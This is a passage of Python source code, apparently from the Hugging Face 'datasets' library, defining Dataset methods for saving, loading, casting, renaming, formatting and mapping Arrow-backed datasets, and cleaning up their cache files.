config.DATASET_INDICES_FILENAME) in cache_files_paths: raise PermissionError( f"Tried to overwrite {Path(dataset_path, config.DATASET_INDICES_FILENAME)} but a dataset can't overwrite itself." ) # Get json serializable state state = { key: dataset.__dict__[key] for key in [ "_fingerprint", "_format_columns", "_format_kwargs", "_format_type", "_indexes", "_output_all_columns", ] } split = dataset.__dict__["_split"] state["_split"] = str(split) if split is not None else split state["_data_files"] = [{"filename": config.DATASET_ARROW_FILENAME}] for k in state["_format_kwargs"].keys(): try: json.dumps(state["_format_kwargs"][k]) except TypeError as e: raise TypeError( str(e) + f"\nThe format kwargs must be JSON serializable, but key '{k}' isn't." ) from None # Get json serializable dataset info dataset_info = asdict(dataset._info) # Save dataset + indices + state + info fs.makedirs(dataset_path, exist_ok=True) with fs.open(Path(dataset_path, config.DATASET_ARROW_FILENAME).as_posix(), "wb") as dataset_file: with ArrowWriter(stream=dataset_file) as writer: writer.write_table(dataset._data) writer.finalize() with fs.open( Path(dataset_path, config.DATASET_STATE_JSON_FILENAME).as_posix(), "w", encoding="utf-8" ) as state_file: json.dump(state, state_file, indent=2, sort_keys=True) with fs.open( Path(dataset_path, config.DATASET_INFO_FILENAME).as_posix(), "w", encoding="utf-8" ) as dataset_info_file: # Sort only the first level of keys, or we might shuffle fields of nested features if we use sort_keys=True sorted_keys_dataset_info = {key: dataset_info[key] for key in sorted(dataset_info)} json.dump(sorted_keys_dataset_info, dataset_info_file, indent=2) logger.info(f"Dataset saved in {dataset_path}") @staticmethod def _build_local_temp_path(uri_or_path: str) -> Path: """ Builds and returns a Path concatenating a local temporary dir with the dir path (or absolute/relative path extracted from the uri) passed. Args: uri_or_path (:obj:`str`): Path (e.g. `"dataset/train"`) or remote URI (e.g. `"s3://my-bucket/dataset/train"`) to concatenate. Returns: :class:`Path`: the concatenated path (temp dir + path) """ src_dataset_path = Path(uri_or_path) tmp_dir = get_temporary_cache_files_directory() return Path(tmp_dir, src_dataset_path.relative_to(src_dataset_path.anchor)) @staticmethod def load_from_disk(dataset_path: str, fs=None, keep_in_memory: Optional[bool] = None) -> "Dataset": """ Loads a dataset that was previously saved using :meth:`save_to_disk` from a dataset directory, or from a filesystem using either :class:`~filesystems.S3FileSystem` or any implementation of ``fsspec.spec.AbstractFileSystem``. Args: dataset_path (:obj:`str`): Path (e.g. `"dataset/train"`) or remote URI (e.g. `"s3//my-bucket/dataset/train"`) of the dataset directory where the dataset will be loaded from. fs (:class:`~filesystems.S3FileSystem`, ``fsspec.spec.AbstractFileSystem``, optional, default ``None``): Instance of the remote filesystem used to download the files from. keep_in_memory (:obj:`bool`, default ``None``): Whether to copy the dataset in-memory. If `None`, the dataset will not be copied in-memory unless explicitly enabled by setting `datasets.config.IN_MEMORY_MAX_SIZE` to nonzero. See more details in the :ref:`load_dataset_enhancing_performance` section. Returns: :class:`Dataset` or :class:`DatasetDict`: - If `dataset_path` is a path of a dataset directory: the dataset requested. - If `dataset_path` is a path of a dataset dict directory: a ``datasets.DatasetDict`` with each split. """ # copies file from filesystem if it is remote filesystem to local filesystem and modifies dataset_path to temp directory containing local copies fs = fsspec.filesystem("file") if fs is None else fs dataset_dict_json_path = Path(dataset_path, config.DATASETDICT_JSON_FILENAME).as_posix() dataset_info_path = Path(dataset_path, config.DATASET_INFO_FILENAME).as_posix() if not fs.isfile(dataset_info_path) and fs.isfile(dataset_dict_json_path): raise FileNotFoundError( f"No such file or directory: '{dataset_info_path}'. Expected to load a Dataset object, but got a DatasetDict. Please use datasets.load_from_disk instead." ) if is_remote_filesystem(fs): src_dataset_path = extract_path_from_uri(dataset_path) dataset_path = Dataset._build_local_temp_path(src_dataset_path) fs.download(src_dataset_path, dataset_path.as_posix(), recursive=True) with open( Path(dataset_path, config.DATASET_STATE_JSON_FILENAME).as_posix(), "r", encoding="utf-8" ) as state_file: state = json.load(state_file) with open( Path(dataset_path, config.DATASET_INFO_FILENAME).as_posix(), "r", encoding="utf-8" ) as dataset_info_file: dataset_info = DatasetInfo.from_dict(json.load(dataset_info_file)) dataset_size = estimate_dataset_size( Path(dataset_path, data_file["filename"]) for data_file in state["_data_files"] ) keep_in_memory = keep_in_memory if keep_in_memory is not None else is_small_dataset(dataset_size) table_cls = InMemoryTable if keep_in_memory else MemoryMappedTable arrow_table = concat_tables( table_cls.from_file(Path(dataset_path, data_file["filename"]).as_posix()) for data_file in state["_data_files"] ) split = state["_split"] split = Split(split) if split is not None else split return Dataset( arrow_table=arrow_table, info=dataset_info, split=split, fingerprint=state["_fingerprint"], ) @property def data(self) -> Table: """The Apache Arrow table backing the dataset.""" return self._data @property def cache_files(self) -> List[dict]: """The cache files containing the Apache Arrow table backing the dataset.""" cache_files = list_table_cache_files(self._data) if self._indices is not None: cache_files += list_table_cache_files(self._indices) return [{"filename": cache_filename} for cache_filename in cache_files] @property def num_columns(self) -> int: """Number of columns in the dataset.""" return self._data.num_columns @property def num_rows(self) -> int: """Number of rows in the dataset (same as :meth:`Dataset.__len__`).""" if self._indices is not None: return self._indices.num_rows return self._data.num_rows @property def column_names(self) -> List[str]: """Names of the columns in the dataset.""" return self._data.column_names @property def shape(self) -> Tuple[int, int]: """Shape of the dataset (number of columns, number of rows).""" if self._indices is not None: return (self._indices.num_rows, self._data.num_columns) return self._data.shape def unique(self, column: str) -> List[Any]: """Return a list of the unique elements in a column. This is implemented in the low-level backend and as such, very fast. Args: column (:obj:`str`): Column name (list all the column names with :func:`datasets.Dataset.column_names`). Returns: :obj:`list`: List of unique elements in the given column. """ if column not in self._data.column_names: raise ValueError(f"Column ({column}) not in table columns ({self._data.column_names}).") if self._indices is not None and self._indices.num_rows != self._data.num_rows: dataset = self.flatten_indices() else: dataset = self return dataset._data.column(column).unique().to_pylist() def class_encode_column(self, column: str, include_nulls: bool = False) -> "Dataset": """Casts the given column as :obj:``datasets.features.ClassLabel`` and updates the table. Args: column (`str`): The name of the column to cast (list all the column names with :func:`datasets.Dataset.column_names`) include_nulls (`bool`, default `False`): Whether to include null values in the class labels. If True, the null values will be encoded as the `"None"` class label. .. versionadded:: 1.14.2 """ # Sanity checks if column not in self._data.column_names: raise ValueError(f"Column ({column}) not in table columns ({self._data.column_names}).") src_feat = self.features[column] if not isinstance(src_feat, Value): raise ValueError( f"Class encoding is only supported for {Value.__name__} column, and column {column} is {type(src_feat).__name__}." ) if src_feat.dtype != "string" or (include_nulls and None in self.unique(column)): def stringify_column(batch): batch[column] = [ str(sample) if include_nulls or sample is not None else None for sample in batch[column] ] return batch dset = self.map( stringify_column, batched=True, desc="Stringifying the column", ) else: dset = self # Create the new feature class_names = sorted(sample for sample in dset.unique(column) if include_nulls or sample is not None) dst_feat = ClassLabel(names=class_names) def cast_to_class_labels(batch): batch[column] = [ dst_feat.str2int(sample) if include_nulls or sample is not None else None for sample in batch[column] ] return batch dset = dset.map( cast_to_class_labels, batched=True, desc="Casting to class labels", ) new_features = dset.features.copy() new_features[column] = dst_feat dset = dset.cast(new_features) return dset @deprecated() @fingerprint_transform(inplace=True) def dictionary_encode_column_(self, column: str): """Dictionary encode a column. Dictionary encode can reduce the size of a column with many repetitions (e.g. string labels columns) by storing a dictionary of the strings. This only affect the internal storage. .. deprecated:: 1.4.0 Args: column (:obj:`str`): """ if column not in self._data.column_names: raise ValueError(f"Column ({column}) not in table columns ({self._data.column_names}).") casted_schema: pa.Schema = self._data.schema field_index = casted_schema.get_field_index(column) field: pa.Field = casted_schema.field(field_index) casted_field = pa.field(field.name, pa.dictionary(pa.int32(), field.type), nullable=False) casted_schema.set(field_index, casted_field) self._data = self._data.cast(casted_schema) self.info.features = Features.from_arrow_schema(self._data.schema) self._data = update_metadata_with_features(self._data, self.features) @deprecated(help_message="Use Dataset.flatten instead.") @fingerprint_transform(inplace=True) def flatten_(self, max_depth=16): """In-place version of :meth:`Dataset.flatten`. .. deprecated:: 1.4.0 Use :meth:`Dataset.flatten` instead. """ for depth in range(1, max_depth): if any(isinstance(field.type, pa.StructType) for field in self._data.schema): self._data = self._data.flatten() else: break self.info.features = Features.from_arrow_schema(self._data.schema) self._data = update_metadata_with_features(self._data, self.features) logger.info(f'Flattened dataset from depth {depth} to depth { 1 if depth + 1 < max_depth else 'unknown'}.') @fingerprint_transform(inplace=False) def flatten(self, new_fingerprint, max_depth=16) -> "Dataset": """Flatten the table. Each column with a struct type is flattened into one column per struct field. Other columns are left unchanged. Returns: :class:`Dataset`: A copy of the dataset with flattened columns. """ dataset = copy.deepcopy(self) for depth in range(1, max_depth): if any(isinstance(field.type, pa.StructType) for field in dataset._data.schema): dataset._data = dataset._data.flatten() else: break dataset.info.features = Features.from_arrow_schema(dataset._data.schema) dataset._data = update_metadata_with_features(dataset._data, dataset.features) logger.info(f'Flattened dataset from depth {depth} to depth {1 if depth + 1 < max_depth else 'unknown'}.') dataset._fingerprint = new_fingerprint return dataset @deprecated(help_message="Use Dataset.cast instead.") def cast_( self, features: Features, batch_size: Optional[int] = 10_000, keep_in_memory: bool = False, load_from_cache_file: bool = True, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 10_000, num_proc: Optional[int] = None, ): """In-place version of :meth:`Dataset.cast`. .. deprecated:: 1.4.0 Use :meth:`Dataset.cast` instead. Args: features (:class:`datasets.Features`): New features to cast the dataset to. The name of the fields in the features must match the current column names. The type of the data must also be convertible from one type to the other. For non-trivial conversion, e.g. string <-> ClassLabel you should use :func:`map` to update the Dataset. batch_size (`Optional[int]`, defaults to `1000`): Number of examples per batch provided to cast. `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to cast. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. load_from_cache_file (:obj:`bool`, default `True` if caching is enabled): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. num_proc (`Optional[int]`, default `None`): Number of processes for multiprocessing. By default it doesn't use multiprocessing. """ if sorted(features) != sorted(self._data.column_names): raise ValueError( f"The columns in features ({list(features)}) must be identical " f"as the columns in the dataset: {self._data.column_names}" ) type = features.type schema = pa.schema({col_name: type[col_name].type for col_name in self._data.column_names}) dataset = self.with_format("arrow") # capture the PyArrow version here to make the lambda serializable on Windows is_pyarrow_at_least_4 = config.PYARROW_VERSION.major >= 4 dataset = dataset.map( lambda t: t.cast(schema) if is_pyarrow_at_least_4 else cast_with_sliced_list_support(t, schema), batched=True, batch_size=batch_size, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=cache_file_name, writer_batch_size=writer_batch_size, num_proc=num_proc, features=features, desc="Casting the dataset", ) self._data = dataset._data self._info = dataset._info self._fingerprint = dataset._fingerprint def cast( self, features: Features, batch_size: Optional[int] = 10_000, keep_in_memory: bool = False, load_from_cache_file: bool = True, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 10_000, num_proc: Optional[int] = None, ) -> "Dataset": """ Cast the dataset to a new set of features. Args: features (:class:`datasets.Features`): New features to cast the dataset to. The name of the fields in the features must match the current column names. The type of the data must also be convertible from one type to the other. For non-trivial conversion, e.g. string <-> ClassLabel you should use :func:`map` to update the Dataset. batch_size (`Optional[int]`, defaults to `1000`): Number of examples per batch provided to cast. `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to cast. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. load_from_cache_file (:obj:`bool`, default `True` if caching is enabled): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. num_proc (`Optional[int]`, default `None`): Number of processes for multiprocessing. By default it doesn't use multiprocessing. Returns: :class:`Dataset`: A copy of the dataset with casted features. """ if sorted(features) != sorted(self._data.column_names): raise ValueError( f"The columns in features ({list(features)}) must be identical " f"as the columns in the dataset: {self._data.column_names}" ) type = features.type schema = pa.schema({col_name: type[col_name].type for col_name in self._data.column_names}) format = self.format dataset = self.with_format("arrow") # capture the PyArrow version here to make the lambda serializable on Windows is_pyarrow_at_least_4 = config.PYARROW_VERSION.major >= 4 dataset = dataset.map( lambda t: t.cast(schema) if is_pyarrow_at_least_4 else cast_with_sliced_list_support(t, schema), batched=True, batch_size=batch_size, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=cache_file_name, writer_batch_size=writer_batch_size, num_proc=num_proc, features=features, desc="Casting the dataset", ) dataset = dataset.with_format(**format) return dataset @fingerprint_transform(inplace=False) def cast_column(self, column: str, feature: FeatureType, new_fingerprint: str) -> "Dataset": """Cast column to feature for decoding. Args: column (:obj:`str`): Column name. feature (:class:`Feature`): Target feature. Returns: :class:`Dataset` """ if hasattr(feature, "decode_example"): dataset = copy.deepcopy(self) dataset.features[column] = feature dataset._fingerprint = new_fingerprint return dataset else: features = self.features.copy() features[column] = feature return self.cast(features) @deprecated(help_message="Use Dataset.remove_columns instead.") @fingerprint_transform(inplace=True) def remove_columns_(self, column_names: Union[str, List[str]]): """In-place version of :meth:`Dataset.remove_columns`. .. deprecated:: 1.4.0 Use :meth:`Dataset.remove_columns` instead. Args: column_names (:obj:`Union[str, List[str]]`): Name of the column(s) to remove. """ if isinstance(column_names, str): column_names = [column_names] for column_name in column_names: if column_name not in self._data.column_names: raise ValueError( f"Column name {column_name} not in the dataset. " f"Current columns in the dataset: {self._data.column_names}" ) for column_name in column_names: del self._info.features[column_name] self._data = self._data.drop(column_names) self._data = update_metadata_with_features(self._data, self.features) @transmit_tasks @fingerprint_transform(inplace=False) def remove_columns(self, column_names: Union[str, List[str]], new_fingerprint) -> "Dataset": """ Remove one or several column(s) in the dataset and the features associated to them. You can also remove a column using :func:`Dataset.map` with `remove_columns` but the present method is in-place (doesn't copy the data to a new dataset) and is thus faster. Args: column_names (:obj:`Union[str, List[str]]`): Name of the column(s) to remove. new_fingerprint Returns: :class:`Dataset`: A copy of the dataset object without the columns to remove. """ dataset = copy.deepcopy(self) if isinstance(column_names, str): column_names = [column_names] for column_name in column_names: if column_name not in dataset._data.column_names: raise ValueError( f"Column name {column_name} not in the dataset. " f"Current columns in the dataset: {dataset._data.column_names}" ) for column_name in column_names: del dataset._info.features[column_name] dataset._data = dataset._data.drop(column_names) dataset._data = update_metadata_with_features(dataset._data, dataset.features) dataset._fingerprint = new_fingerprint return dataset @deprecated(help_message="Use Dataset.rename_column instead.") @fingerprint_transform(inplace=True) def rename_column_(self, original_column_name: str, new_column_name: str): """In-place version of :meth:`Dataset.rename_column`. .. deprecated:: 1.4.0 Use :meth:`Dataset.rename_column` instead. Args: original_column_name (:obj:`str`): Name of the column to rename. new_column_name (:obj:`str`): New name for the column. """ if original_column_name not in self._data.column_names: raise ValueError( f"Original column name {original_column_name} not in the dataset. " f"Current columns in the dataset: {self._data.column_names}" ) if new_column_name in self._data.column_names: raise ValueError( f"New column name {original_column_name} already in the dataset. " f"Please choose a column name which is not already in the dataset. " f"Current columns in the dataset: {self._data.column_names}" ) if not new_column_name: raise ValueError("New column name is empty.") def rename(columns): return [new_column_name if col == original_column_name else col for col in columns] new_column_names = rename(self._data.column_names) if self._format_columns is not None: self._format_columns = rename(self._format_columns) self._info.features = Features( { new_column_name if col == original_column_name else col: feature for col, feature in self._info.features.items() } ) self._data = self._data.rename_columns(new_column_names) self._data = update_metadata_with_features(self._data, self.features) @transmit_tasks @fingerprint_transform(inplace=False) def rename_column(self, original_column_name: str, new_column_name: str, new_fingerprint) -> "Dataset": """ Rename a column in the dataset, and move the features associated to the original column under the new column name. Args: original_column_name (:obj:`str`): Name of the column to rename. new_column_name (:obj:`str`): New name for the column. new_fingerprint Returns: :class:`Dataset`: A copy of the dataset with a renamed column. """ dataset = copy.deepcopy(self) if original_column_name not in dataset._data.column_names: raise ValueError( f"Original column name {original_column_name} not in the dataset. " f"Current columns in the dataset: {dataset._data.column_names}" ) if new_column_name in dataset._data.column_names: raise ValueError( f"New column name {original_column_name} already in the dataset. " f"Please choose a column name which is not already in the dataset. " f"Current columns in the dataset: {dataset._data.column_names}" ) if not new_column_name: raise ValueError("New column name is empty.") def rename(columns): return [new_column_name if col == original_column_name else col for col in columns] new_column_names = rename(self._data.column_names) if self._format_columns is not None: dataset._format_columns = rename(self._format_columns) dataset._info.features = Features( { new_column_name if col == original_column_name else col: feature for col, feature in self._info.features.items() } ) dataset._data = dataset._data.rename_columns(new_column_names) dataset._data = update_metadata_with_features(dataset._data, dataset.features) dataset._fingerprint = new_fingerprint return dataset @transmit_tasks @fingerprint_transform(inplace=False) def rename_columns(self, column_mapping: Dict[str, str], new_fingerprint) -> "Dataset": """ Rename several columns in the dataset, and move the features associated to the original columns under the new column names. Args: column_mapping (:obj:`Dict[str, str]`): A mapping of columns to rename to their new names Returns: :class:`Dataset`: A copy of the dataset with renamed columns """ dataset = copy.deepcopy(self) extra_columns = set(column_mapping.keys()) - set(dataset.column_names) if extra_columns: raise ValueError( f"Original column names {extra_columns} not in the dataset. " f"Current columns in the dataset: {dataset._data.column_names}" ) number_of_duplicates_in_new_columns = len(column_mapping.values()) - len(set(column_mapping.values())) if number_of_duplicates_in_new_columns != 0: raise ValueError( "New column names must all be different, but this column mapping " f"has {number_of_duplicates_in_new_columns} duplicates" ) empty_new_columns = [new_col for new_col in column_mapping.values() if not new_col] if empty_new_columns: raise ValueError(f"New column names {empty_new_columns} are empty.") def rename(columns): return [column_mapping[col] if col in column_mapping else col for col in columns] new_column_names = rename(self._data.column_names) if self._format_columns is not None: dataset._format_columns = rename(self._format_columns) dataset._info.features = Features( { column_mapping[col] if col in column_mapping else col: feature for col, feature in (self._info.features or {}).items() } ) dataset._data = dataset._data.rename_columns(new_column_names) dataset._data = update_metadata_with_features(dataset._data, dataset.features) dataset._fingerprint = new_fingerprint return dataset def __len__(self): """Number of rows in the dataset.""" return self.num_rows def __iter__(self): """Iterate through the examples. If a formatting is set with :meth:`Dataset.set_format` rows will be returned with the selected format. """ for index in range(self.num_rows): yield self._getitem( index, decoded=False, ) def __repr__(self): return f"Dataset({{\n features: {list(self.features.keys())},\n num_rows: {self.num_rows}\n}})" @property def format(self): return { "type": self._format_type, "format_kwargs": self._format_kwargs, "columns": self.column_names if self._format_columns is None else self._format_columns, "output_all_columns": self._output_all_columns, } @contextlib.contextmanager def formatted_as( self, type: Optional[str] = None, columns: Optional[List] = None, output_all_columns: bool = False, **format_kwargs, ): """To be used in a `with` statement. Set __getitem__ return format (type and columns). Args: type (Optional ``str``): output type selected in [None, 'numpy', 'torch', 'tensorflow', 'pandas', 'arrow'] None means __getitem__ returns python objects (default) columns (Optional ``List[str]``): columns to format in the output None means __getitem__ returns all columns (default) output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) format_kwargs: keywords arguments passed to the convert function like `np.array`, `torch.tensor` or `tensorflow.ragged.constant`. """ old_format_type = self._format_type old_format_kwargs = self._format_kwargs old_format_columns = self._format_columns old_output_all_columns = self._output_all_columns try: self.set_format(type, columns, output_all_columns, **format_kwargs) yield finally: self.set_format(old_format_type, old_format_columns, old_output_all_columns, **old_format_kwargs) @fingerprint_transform(inplace=True) def set_format( self, type: Optional[str] = None, columns: Optional[List] = None, output_all_columns: bool = False, **format_kwargs, ): """Set __getitem__ return format (type and columns). The data formatting is applied on-the-fly. The format ``type`` (for example "numpy") is used to format batches when using __getitem__. It's also possible to use custom transforms for formatting using :func:`datasets.Dataset.set_transform`. Args: type (Optional ``str``): Either output type selected in [None, 'numpy', 'torch', 'tensorflow', 'pandas', 'arrow']. None means __getitem__ returns python objects (default) columns (Optional ``List[str]``): columns to format in the output. None means __getitem__ returns all columns (default). output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) format_kwargs: keywords arguments passed to the convert function like `np.array`, `torch.tensor` or `tensorflow.ragged.constant`. It is possible to call ``map`` after calling ``set_format``. Since ``map`` may add new columns, then the list of formatted columns gets updated. In this case, if you apply ``map`` on a dataset to add a new column, then this column will be formatted: new formatted columns = (all columns - previously unformatted columns) """ format_kwargs.update(format_kwargs.pop("format_kwargs", {})) # allow to use self.set_format(self.format) # Check that the format_type and format_kwargs are valid and make it possible to have a Formatter type = get_format_type_from_alias(type) _ = get_formatter(type, features=self.features, **format_kwargs) # Check filter column if isinstance(columns, str): columns = [columns] if isinstance(columns, tuple): columns = list(columns) if columns is not None and any(col not in self._data.column_names for col in columns): raise ValueError( f"Columns {list(filter(lambda col: col not in self._data.column_names, columns))} not in the dataset. Current columns in the dataset: {self._data.column_names}" ) if columns is not None: columns = columns.copy() # Ensures modifications made to the list after this call don't cause bugs self._format_type = type self._format_kwargs = format_kwargs self._format_columns = columns self._output_all_columns = output_all_columns logger.debug( "Set __getitem__(key) output type to %s for %s columns " " (when key is int or slice) and %s output other (un-formatted) columns.", "python objects" if type is None else type, "no" if columns is None else str(columns), "do" if output_all_columns else "don't", ) def reset_format(self): """Reset __getitem__ return format to python objects and all columns. Same as ``self.set_format()`` """ self.set_format() def set_transform( self, transform: Optional[Callable], columns: Optional[List] = None, output_all_columns: bool = False, ): """Set __getitem__ return format using this transform. The transform is applied on-the-fly on batches when __getitem__ is called. As :func:`datasets.Dataset.set_format`, this can be reset using :func:`datasets.Dataset.reset_format` Args: transform (Optional ``Callable``): user-defined formatting transform, replaces the format defined by :func:`datasets.Dataset.set_format` A formatting function is a callable that takes a batch (as a dict) as input and returns a batch. This function is applied right before returning the objects in __getitem__. columns (Optional ``List[str]``): columns to format in the output If specified, then the input batch of the transform only contains those columns. output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) If set to True, then the other un-formatted columns are kept with the output of the transform. """ self.set_format("custom", columns=columns, output_all_columns=output_all_columns, transform=transform) def with_format( self, type: Optional[str] = None, columns: Optional[List] = None, output_all_columns: bool = False, **format_kwargs, ): """Set __getitem__ return format (type and columns). The data formatting is applied on-the-fly. The format ``type`` (for example "numpy") is used to format batches when using __getitem__. It's also possible to use custom transforms for formatting using :func:`datasets.Dataset.with_transform`. Contrary to :func:`datasets.Dataset.set_format`, ``with_format`` returns a new Dataset object. Args: type (Optional ``str``): Either output type selected in [None, 'numpy', 'torch', 'tensorflow', 'pandas', 'arrow']. None means __getitem__ returns python objects (default) columns (Optional ``List[str]``): columns to format in the output None means __getitem__ returns all columns (default) output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) format_kwargs: keywords arguments passed to the convert function like `np.array`, `torch.tensor` or `tensorflow.ragged.constant`. """ dataset = copy.deepcopy(self) dataset.set_format(type=type, columns=columns, output_all_columns=output_all_columns, **format_kwargs) return dataset def with_transform( self, transform: Optional[Callable], columns: Optional[List] = None, output_all_columns: bool = False, ): """Set __getitem__ return format using this transform. The transform is applied on-the-fly on batches when __getitem__ is called. As :func:`datasets.Dataset.set_format`, this can be reset using :func:`datasets.Dataset.reset_format`. Contrary to :func:`datasets.Dataset.set_transform`, ``with_transform`` returns a new Dataset object. Args: transform (Optional ``Callable``): user-defined formatting transform, replaces the format defined by :func:`datasets.Dataset.set_format` A formatting function is a callable that takes a batch (as a dict) as input and returns a batch. This function is applied right before returning the objects in __getitem__. columns (Optional ``List[str]``): columns to format in the output If specified, then the input batch of the transform only contains those columns. output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) If set to True, then the other un-formatted columns are kept with the output of the transform. """ dataset = copy.deepcopy(self) dataset.set_transform(transform=transform, columns=columns, output_all_columns=output_all_columns) return dataset def prepare_for_task(self, task: Union[str, TaskTemplate], id: int = 0) -> "Dataset": """Prepare a dataset for the given task by casting the dataset's :class:`Features` to standardized column names and types as detailed in :py:mod:`datasets.tasks`. Casts :attr:`datasets.DatasetInfo.features` according to a task-specific schema. Intended for single-use only, so all task templates are removed from :attr:`datasets.DatasetInfo.task_templates` after casting. Args: task (:obj:`Union[str, TaskTemplate]`): The task to prepare the dataset for during training and evaluation. If :obj:`str`, supported tasks include: - :obj:`"text-classification"` - :obj:`"question-answering"` If :obj:`TaskTemplate`, must be one of the task templates in :py:mod:`datasets.tasks`. id (:obj:`int`, default `0`): The id required to unambiguously identify the task template when multiple task templates of the same type are supported. """ # TODO(lewtun): Add support for casting nested features like answers.text and answers.answer_start in SQuAD if isinstance(task, str): tasks = [template.task for template in (self.info.task_templates or [])] compatible_templates = [template for template in (self.info.task_templates or []) if template.task == task] if not compatible_templates: raise ValueError( f"Task {task} is not compatible with this dataset! Available tasks: {list(unique_values(tasks))}" ) if not 0 <= id < len(compatible_templates): templates_list_str = "\n".join( f"- `{idx}` for task {template}" for idx, template in enumerate(compatible_templates) ) raise ValueError( f"Id {id} for task {task} is not in a valid range. Supported ids:\n{templates_list_str}" ) template = compatible_templates[id] elif isinstance(task, TaskTemplate): template = task else: raise ValueError( f"Expected a `str` or `datasets.TaskTemplate` object but got task {task} with type {type(task)}." ) template = template.align_with_features(self.info.features) column_mapping = template.column_mapping columns_to_drop = [column for column in self.column_names if column not in column_mapping] dataset = self.remove_columns(columns_to_drop) dataset = dataset.rename_columns(column_mapping) # We found a template so now flush `DatasetInfo` to skip the template update in `DatasetInfo.__post_init__` dataset.info.task_templates = None dataset = dataset.cast(features=template.features) return dataset def _getitem(self, key: Union[int, slice, str], decoded: bool = True, **kwargs) -> Union[Dict, List]: """ Can be used to index columns (by string names) or rows (by integer index, slices, or iter of indices or bools) """ format_type = kwargs["format_type"] if "format_type" in kwargs else self._format_type format_columns = kwargs["format_columns"] if "format_columns" in kwargs else self._format_columns output_all_columns = ( kwargs["output_all_columns"] if "output_all_columns" in kwargs else self._output_all_columns ) format_kwargs = kwargs["format_kwargs"] if "format_kwargs" in kwargs else self._format_kwargs format_kwargs = format_kwargs if format_kwargs is not None else {} formatter = get_formatter(format_type, features=self.features, decoded=decoded, **format_kwargs) pa_subtable = query_table(self._data, key, indices=self._indices if self._indices is not None else None) formatted_output = format_table( pa_subtable, key, formatter=formatter, format_columns=format_columns, output_all_columns=output_all_columns ) return formatted_output @overload def __getitem__(self, key: Union[int, slice, Iterable[int]]) -> Dict: # noqa: F811 ... @overload def __getitem__(self, key: str) -> List: # noqa: F811 ... def __getitem__(self, key): # noqa: F811 """Can be used to index columns (by string names) or rows (by integer index or iterable of indices or bools).""" return self._getitem( key, ) def cleanup_cache_files(self) -> int: """Clean up all cache files in the dataset cache directory, excepted the currently used cache file if there is one. Be careful when running this command that no other process is currently using other cache files. Returns: :obj:`int`: Number of removed files. """ current_cache_files = [os.path.abspath(cache_file["filename"]) for cache_file in self.cache_files] if not current_cache_files: return 0 cache_directory = os.path.dirname(current_cache_files[0]) logger.info(f"Listing files in {cache_directory}") files: List[str] = os.listdir(cache_directory) files_to_remove = [] for f_name in files: full_name = os.path.abspath(os.path.join(cache_directory, f_name)) if f_name.startswith("cache-") and f_name.endswith(".arrow"): if full_name in current_cache_files: logger.info(f"Keeping currently used cache file at {full_name}") continue files_to_remove.append(full_name) for file_path in files_to_remove: logger.info(f"Removing {file_path}") os.remove(file_path) return len(files_to_remove) def _get_cache_file_path(self, fingerprint): if is_caching_enabled() and self.cache_files: cache_file_name = "cache-" + fingerprint + ".arrow" cache_directory = os.path.dirname(self.cache_files[0]["filename"]) else: cache_file_name = "cache-" + generate_random_fingerprint() + ".arrow" cache_directory = get_temporary_cache_files_directory() cache_file_path = os.path.join(cache_directory, cache_file_name) return cache_file_path def map( self, function: Optional[Callable] = None, with_indices: bool = False, with_rank: bool = False, input_columns: Optional[Union[str, List[str]]] = None, batched: bool = False, batch_size: Optional[int] = 1000, drop_last_batch: bool = False, remove_columns: Optional[Union[str, List[str]]] = None, keep_in_memory: bool = False, load_from_cache_file: bool = None, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, features: Optional[Features] = None, disable_nullable: bool = False, fn_kwargs: Optional[dict] = None, num_proc: Optional[int] = None, suffix_template: str = "_{rank:05d}_of_{num_proc:05d}", new_fingerprint: Optional[str] = None, desc: Optional[str] = None, ) -> "Dataset": """Apply a function to all the elements in the table (individually or in batches) and update the table (if function does update examples). Args: function (:obj:`Callable`): Function with one of the following signatures: - `function(example: Union[Dict, Any]) -> Union[Dict, Any]` if `batched=False` and `with_indices=False` and `with_rank=False` - `function(example: Union[Dict, Any], *extra_args) -> Union[Dict, Any]` if `batched=False` and `with_indices=True` and/or `with_rank=True` (one extra arg for each) - `function(batch: Union[Dict[List], List[Any]]) -> Union[Dict, Any]` if `batched=True` and `with_indices=False` and `with_rank=False` - `function(batch: Union[Dict[List], List[Any]], *extra_args) -> Union[Dict, Any]` if `batched=True` and `with_indices=True` and/or `with_rank=True` (one extra arg for each) If no function is provided, default to identity function: ``lambda x: x``. with_indices (:obj:`bool`, default `False`): Provide example indices to `function`. Note that in this case the signature of `function` should be `def function(example, idx[, rank]): ...`. with_rank (:obj:`bool`, default `False`): Provide process rank to `function`. Note that in this case the signature of `function` should be `def function(example[, idx], rank): ...`. input_columns (`Optional[Union[str, List[str]]]`, default `None`): The columns to be passed into `function` as positional arguments. If `None`, a dict mapping to all formatted columns is passed as one argument. batched (:obj:`bool`, default `False`): Provide batch of examples to `function`. batch_size (`Optional[int]`, default `1000`): Number of examples per batch provided to `function` if `batched=True` `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to `function`. drop_last_batch (:obj:`bool`, default `False`): Whether 